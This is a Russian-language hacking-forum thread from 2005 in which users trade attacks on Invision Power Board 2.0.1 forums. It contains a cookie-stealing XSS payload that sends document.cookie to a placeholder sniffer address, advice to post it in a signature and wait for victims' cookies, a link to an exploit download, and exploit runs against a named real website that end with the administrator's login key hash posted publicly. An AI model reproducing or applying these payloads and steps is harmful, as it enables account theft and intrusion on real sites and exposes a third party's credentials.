Форумы IPB v2.0.1 - Что это такое? И с чем его едят?

Discussion in 'Уязвимости CMS/форумов' started by Dimazzz, 23 Nov 2005.

  1. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Что это такое? И с чем его едят? Можите по этому движку что нить дать?
     
  2. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
  3. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Дай по конкретней ссылку :))
    и что нужно говорят исправить в сплоите?
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    что тебе ещё давать???????? и так всё понятно!
    1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1
    2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...
     
  5. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Да я понимаю но в этом сплоите есть ошибка??? какая она
     
  6. W.W.

    W.W. New Member

    Joined:
    21 Nov 2005
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Я бы дал такую ссылку. Там всё есть. А от собственного нежелания искать (между прочим, за 10 минут можно управиться) нечего напрягать других.
     
  7. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Код XSS
    HTML:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie) [/COLOR]
    Сплоит качай тут (Исправленный)
    www.barsik.jino-net.ru/ipb.rar

    Сплоит удалю сегодня вечером так что качай :)
     
  8. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Код XXS как? куда? его применить?
     
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Ipb ни с чем не едят блин..
    да и вообще иди выучи что такое хсс и потом спрашивай.....
     
  10. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Код Xss, который тебе дали нужно отредактировать под свой или ачатовский, или любой другой сниффер, а потом запостить всё это на форуме или втыкнуть в подпись и ждать пока придут куки.....
    Спрашивай, что не понятно, если сам знаю, то объясню-)))) И не забывай про репутацию...;-)
     
  11. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
    [~] SERVER : www.himclan.com
    [~] PATH : /forum/
    [~] MEMBER ID : 1
    [~] TARGET : 1 - IPB 2.*
    [~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference
    at c:\perl\sploit\ipb.pl line 134.

    сплоит вот что пишет что значит?
     
  12. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Это значит, что в сплойте есть ошибка в строке 134.
     
  13. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Нет не обязательно.
    У меня такое бывает довольно часто. А раза с пятого хэшик получаю. Хотя может ошибка и другая была :)
     
  14. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    попробуй написать
    site.ru /forum/ 1 0
     
  15. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.
     
  16. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Не знаю, у меня ни разу такого не было.
     
  17. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Это значит что сплоит получает в ответ символ, который не может корректно обработать, зависит не от сплоита, а от ответа сервера который бомбишь.
     
  18. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Да все работает...
    Вот вам Хэш Админа

    C:\Tools\Программы>perl ipb.pl www.himclan.com /forum/ 1 1
    [~] SERVER : www.himclan.com
    [~] PATH : /forum/
    [~] MEMBER ID : 1
    [~] TARGET : 1 - IPB 2.*
    [~] SEARCHING PASSWORD ... [ DONE ]

    MEMBER ID : 1
    MEMBER_LOGIN_KEY : b65e23ca7ec5961b2c6710237c988e48

    Не забудьте про репутацию :))
    PS На форуме присутствует также XSS Баг :))
     
    1 person likes this.
  19. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Эге...
    Могу еще один сплоит посоветовать, если найдешь...
    ipb_skides.pl
    Классная тема... Нужная, найдешь береги, не давай никому...
    :)
     
  20. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182